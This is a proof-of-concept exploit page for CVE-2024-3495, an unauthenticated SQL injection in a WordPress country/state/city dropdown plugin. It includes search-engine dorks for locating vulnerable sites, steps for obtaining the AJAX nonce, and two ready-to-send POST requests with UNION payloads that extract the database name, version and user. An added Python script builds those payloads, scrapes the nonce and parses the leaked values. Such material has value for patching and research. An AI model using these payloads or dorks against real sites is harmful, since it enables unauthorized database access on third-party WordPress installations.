## https://sploitus.com/exploit?id=EDF4B3F8-DDF4-5196-A375-EC81B8BC18F1
# CVE-2024-3495-Poc
CVE-2024-3495 Country State City Dropdown CF7 <= 2.7.2 - Unauthenticated SQL Injection

Description

The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the 'cnt' and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping of the user-supplied parameter and lack of sufficient preparation on the existing SQL query. The affected AJAX actions (tc_csca_get_states and tc_csca_get_cities) are reachable by unauthenticated users through wp-admin/admin-ajax.php.

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/country-state-city-auto-dropdown/country-state-city-dropdown-cf7-272-unauthenticated-sql-injection

Google dork:

```
inurl:"/wp-content/plugins/country-state-city-auto-dropdown/"
```

```
https://x.com/fofabot/status/1793477848428364155
FOFA Query: body="/wp-content/plugins/country-state-city-auto-dropdown/"
https://en.fofa.info/result?qbase64=Ym9keT0iL3dwLWNvbnRlbnQvcGx1Z2lucy9jb3VudHJ5LXN0YXRlLWNpdHktYXV0by1kcm9wZG93bi8i
```

Vulnerable code, file: includes\ajax-actions.php
![image](https://github.com/truonghuuphuc/CVE-2024-3495-Poc/assets/20487674/e29eb5d1-c90d-4f79-8409-cccd213ac18c)

Found nonce (the nonce_ajax value sent with the AJAX requests below):
![image](https://github.com/truonghuuphuc/CVE-2024-3495-Poc/assets/20487674/c605bb8f-65f7-4425-84d7-ac9285568be7)


PoC (replace {{nonce}} with the nonce_ajax value found above; the hex literals decode to 'database:', '|version:' and '|user:', so the injected row comes back as one tagged string; Content-Length: 172 assumes a standard 10-character WordPress nonce):

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172

action=tc_csca_get_cities&nonce_ajax={{nonce}}&sid=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172

action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```

![image](https://github.com/truonghuuphuc/CVE-2024-3495-Poc/assets/20487674/350142b4-e5d2-43a2-a266-9cc5fd846f7c)

![image](https://github.com/truonghuuphuc/CVE-2024-3495-Poc/assets/20487674/8e8053b3-2185-4a6e-983b-84afbab385b4)
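The following Python script is an added worked example and is not code from this PoC repository or from the plugin. It builds the two request bodies above from a nonce (so the 0x... literals are shown for what they are, hex-encoded ASCII markers, and the Content-Length of 172 is confirmed), simulates why `1 or 0 union select ...,2,3-- -` succeeds against an unprepared three-column query but not against a bound parameter, and extracts the markers from a response. The cities table, the JSON response and the `nonce_ajax` markup matched by `find_nonce` are constructed assumptions; SQLite stands in for MySQL in the simulation, so `version()` becomes `sqlite_version()` there.

```python
"""Added example for CVE-2024-3495 (not the PoC repo's or the plugin's code).
Runs fully offline against constructed data."""
import re
import sqlite3

MARKERS = ("database:", "|version:", "|user:")


def hexlit(s: str) -> str:
    """MySQL hex literal for an ASCII string: 'database:' -> 0x64617461626173653a.
    The PoC uses these so the payload needs no quote characters."""
    return "0x" + s.encode("ascii").hex()


def mysql_payload() -> str:
    """The injection string from the PoC, before form encoding."""
    concat = ",".join([hexlit(MARKERS[0]), "database()",
                       hexlit(MARKERS[1]), "version()",
                       hexlit(MARKERS[2]), "user()"])
    return f"1 or 0 union select concat({concat}),2,3-- -"


def build_body(action: str, param: str, nonce: str, payload: str = None) -> str:
    """Form body for admin-ajax.php: action, nonce_ajax and the injected
    parameter. Only spaces are encoded (as '+'), exactly as in the PoC."""
    payload = mysql_payload() if payload is None else payload
    return f"action={action}&nonce_ajax={nonce}&{param}={payload.replace(' ', '+')}"


def find_nonce(html: str):
    """Assumption: the nonce is exposed to the plugin's JS as a 'nonce_ajax'
    value (wp_localize_script style). WordPress nonces are 10 hex chars."""
    m = re.search(r'nonce_ajax["\']?\s*[:=]\s*["\']([0-9a-f]{10})["\']', html)
    return m.group(1) if m else None


def run_query(state_id: str, prepared: bool):
    """Constructed stand-in for the plugin's lookup: three columns selected by
    state id. prepared=False concatenates the parameter into the SQL, which is
    the bug; prepared=True binds it, as $wpdb->prepare() would."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE cities(name TEXT, id INTEGER, state_id INTEGER);"
        "INSERT INTO cities VALUES ('Hanoi',1,1),('Da Nang',2,2);"
    )
    if prepared:
        cur = con.execute(
            "SELECT name,id,state_id FROM cities WHERE state_id = ?", (state_id,))
    else:
        cur = con.execute(
            f"SELECT name,id,state_id FROM cities WHERE state_id = {state_id}")
    return cur.fetchall()


def parse_markers(body: str):
    """Pull database/version/user out of any response text that contains the
    concat() output; works on raw text, so the JSON shape does not matter."""
    m = re.search(r"database:([^|]*)\|version:([^|]*)\|user:([^\"'<\s]*)", body)
    if m is None:
        return None
    return {"database": m.group(1), "version": m.group(2), "user": m.group(3)}


if __name__ == "__main__":
    body = build_body("tc_csca_get_cities", "sid", "abcdef1234")
    print(len(body), body)
    sqlite_inj = "1 or 0 union select sqlite_version(),2,3-- -"
    print("unprepared:", run_query(sqlite_inj, prepared=False))
    print("prepared:  ", run_query(sqlite_inj, prepared=True))
    # constructed response, not captured from a real target
    print(parse_markers(
        '[{"id":"database:wp_site|version:8.0.36|user:wp@localhost","name":"2"}]'))
```

With the unprepared branch the result set contains the legitimate city row plus the injected row whose first column is the function output; with the bound parameter the whole string is compared as a value and nothing matches. Swap `tc_csca_get_cities`/`sid` for `tc_csca_get_states`/`cnt` to get the second request body.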